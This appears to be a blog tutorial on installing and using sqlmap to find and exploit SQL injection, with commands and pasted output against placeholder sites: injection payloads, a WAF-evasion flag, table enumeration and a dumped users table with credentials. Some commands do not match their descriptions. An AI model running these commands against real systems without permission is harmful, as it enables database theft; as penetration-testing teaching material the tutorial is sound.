What is SQLMAP?
Sqlmap is a python based tool.Which means it will run on any system with python. However, we love linux more ,it simply makes it easy to get stuff done.
Python comes already installed in some linux . SQLmap is opensource tool . It is used in penetration testing to detect and exploit SQL injections flaws Sqlmap automate the process of detecting and exploiting SQL injection. Via SQLMAP tool we could get targeted machine's SQL server access.
Contents:
- Install SQLmap
- HTTP GET
- Getting blocked by WAF
- Database Tables
- Dump database......
How to Install SQLmap?
Step 1: Get a Linux based Operating System or Windows
If you are running SQLmap on Windows with Python, make sure you have Python installed, and skip down to the next step. Otherwise, get your Linux system .Or install a Linux virtual machine (Ubuntu or Kali recommended) on Windows (Virtualbox / VMware / Parrallels) or boot up your Linux desktop.
If you are running Microsoft Windows as your main system, it is convenient and simple to run an install of Ubuntu Linux (or Kali Linux) in a virtual machine with the help of virtual box or vmware. You can then play with sqlmap, nmap, nikto and thousands of Tools.
Step 2: SQLmap Installation
Only for Linux users:
First of all install python2 by typing
sudo apt-get install python2
For windows users:
Download python2 rom python.org
Linux users:
Now , All you need to do is clone the repository from GitHub and start your testing.
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.gitCloning into 'sqlmap-dev'... remote: Counting objects: 633, done.remote: Compressing objects: 100% (602/602), done. remote: Total 633 (delta 170), reused 171 (delta 20), pack-reused 0 Receiving objects: 100% (633/633), 7.17 MiB | 2.44 MiB/s, done. Resolving deltas: 100% (170/170), done.For windows users:
https://github.com/sqlmapproject/sqlmap
Now , Change your current directory and run the python script .
~$ cd sqlmap
Type this into your machine:
python2 sqlmap.py
kali~: $ python2 sqlmap.py
Usage: python sqlmap.py [options]
sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --list-tampers, --wizard, --update, --purge-output or --dependencies),
use -h for basic or -hh for advanced help
If you do not see above output make sure python is working fine, try python -V to check the version and you are in the right location. Now lets move further.
To get a full list of the options/help available , run python2 sqlmap.py -h
To show advance help and options available run python2 sqlmap.py -hh
Running SQLmap:
Simple HTTP GET based test:
In this test we will use a HTTP GET based request against a URI with a parameter (?id=5). This will test different SQL injection methods on the id parameter.
python2 sqlmap.py -u 'http://example.com/page.php?id=5'In the result we could see the different methods used against the parameter
___
__H__
___ ___[']_____ ___ ___
|_ -| . ['] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 12:5:56
[12:55:56] [INFO] testing connection to the target URL
[12:55:57] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[12:55:58] [INFO] testing if the target URL content is stable
[12:55:58] [INFO] target URL content is stable
[12:55:58] [INFO] testing if GET parameter 'id' is dynamic
[12:55:58] [INFO] confirming that GET parameter 'id' is dynamic
[12:55:59] [INFO] GET parameter 'id is dynamic
[12:55:59] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:56:00] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[12:56:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:56:18] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="hac")
[12:56:18] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINTUNSIGNED)'
[12:56:19] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 53 HTTP(s) requests
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 561=561
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 3 column
Payload: id=-6630 UNION ALL SELECT NULL,CONCAT(0x7178786271,0x7434e597a45536f5a4c695273427857546c7554854574c4f5a534f587368725142615a54456256,0x716b767a71),NULL-- mIJj
---
[12:56:52] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.15
back-end DBMS: MySQL >= 5.0.12
[12:56:52] [INFO] fetched data logged to text files under '/home/example/.sqlmap/output/example'
[*] shutting down at 12:56:If you are getting blocked by the Web Application Firewall
Try to using a different user agent then the default sqlmap with the --randomagent parameter
Like this
python sqlmap.py -u "http://example.com/page.php?id=5" --random-agent'
Fetch the Database Tables
SQLMAP can be used to test and exploit SQL Injection, doing things such as extracting data from databases, updating tables, and even popping shells on remote hosts if all the ducks are in line.
Let's retrieve the tables from the database using the SQL Injection vulnerability we confirmed above. As you will see in the output below, we can continue testing against the target without having to retest the vulnerability. SQLmap uses information it knows about the site to further exploit the target database.
To retrieve data we simply add a parameter to the previous command. By adding --tables we can attempt to retrieve all the tables.
Kali@ok:~/sqlmap$ python sqlmap.py -u 'http://mytestsite.com/page.php?id=5' --tables ___ -- __H__ ___ ___[']_____ ___ ___ |_ -| . ['] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 12:59:04 [12:59:04] [INFO] resuming back-end DBMS 'mysql' [12:59:04] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 9561=9561 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=1 AND SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: ud=-6630 UNION ALL SELECT NULL,CONCAT(0x7178786271,0x79434e597a45536f5a4c695273427857546c76554854574c4f5a534f587368725142615a54456256,0x716b767a71),NULL-- mIJj --- [12:59:05] [INFO] the back-end DBMS is MySQL web application technology: Nginx, PHP 5.3.10 back-end DBMS: MySQL >= 5.0.12 Database: books [8 tables] +---------------------------------------+ | author | | shoppingcarts | | categories | | featured | | guestbook | | pictures | | products | | users | +---------------------------------------+ Database: information_schema [28 tables] == snipped == +---------------------------------------+ | CHARACTER_SETS | | COLLATIONS | | COLLATION_CHARACTER_SET_APPLICABILITY | | COLUMNS | | TRIGGERS | | USER_PRIVILEGES | | VIEWS | +---------------------------------------+ [12:59:21] [INFO] fetched data logged to text files under '/home/elliot/.sqlmap/output/mytestsite.com' [*] shutting down at 12:59:21
Dump the data
To get data we simply extend our commands. By adding -T it will focus in on the users table where we may able to get some credentials. By adding
-dump
it will tell SQLmap to grab all the database from the users table, first the columns will be enumerated and after, the data will be dumped from the columns.
Kali@ok:~/sqlmap$ python sqlmap.py -u 'http://example.com/page.php?id=5' --tables ___ __H__ ___ ___[']_____ ___ ___ {1.5.2.12#dev} |_ -| . ['] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 12:59:04 [12:59:04] [INFO] resuming back-end DBMS 'mysql' [12:59:04] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- SNIP ----- Database: users Table: users [1 entry] +----------+----------------------------------+------+-------+---------+------------------------+-----------------+ | name | cart | pass | user | phone | email | address | ----------+-----------------------------------+------+-------+---------+------------------------+-----------------+ | Kaliosk | 55207107sfefsff8e7f2fa5ef4fa00f6 | test | test | 4678654 | example@testtest.com | | +----------+----------------------------------+------+-------+---------+------------------------+-----------------+ [13:08:36] [INFO] table 'users' dumped to CSV file '/home/fred/.sqlmap/output/example/dump/books/users.csv' [13:08:36] [INFO] fetched data logged to text files under '/home/fred/.sqlmap/output/example' [*] shutting down at 13:08:36
SQLmap Tips:
Verbose output
When we are testing for SQL Injection, it is always necessary to dig into the requests manually to determine problems with the test .After being able to increase the verbosity of your SQLmap output will help with this testing.
You can increase verbosity to 4 by doing this you can get the HTTP requests, with 5 you also see theHTTP response headers, and 6 will show the fu HTTP response. Some time this can get super noisy but sometimes you need to see what is happening.
Did you get Database Credentials?
This tip gonna allow you to connect to the database directly and dump data like users, databases, or tables.Good thing about this is you don't have to remember the SQL syntax for the database or have a client installed. SQLmap will do the heavy lifting acting like a Database Client to dump all the data.
Database Connection strings:
MySQL, Oracle, Microsoft SQL Server, PostgreSQL...
DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAMESQLite, Microsoft Access
DBMS://DATABASE_FILEPATH
ALL THE COMMAND WHICH WE USED ABOVE:
- git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
- cd sqlmap-dev
- python sqlmap.py
- python sqlmap.py -u 'http://example.com/page.php?id=5'
- python sqlmap.py -u "http://mytestsite.com/page.php?id=5" --random-agent
- python sqlmap.py -u 'http://mytestsite.com/page.php?id=5' --tables
- python sqlmap.py -h
- python sqlmap.py -hh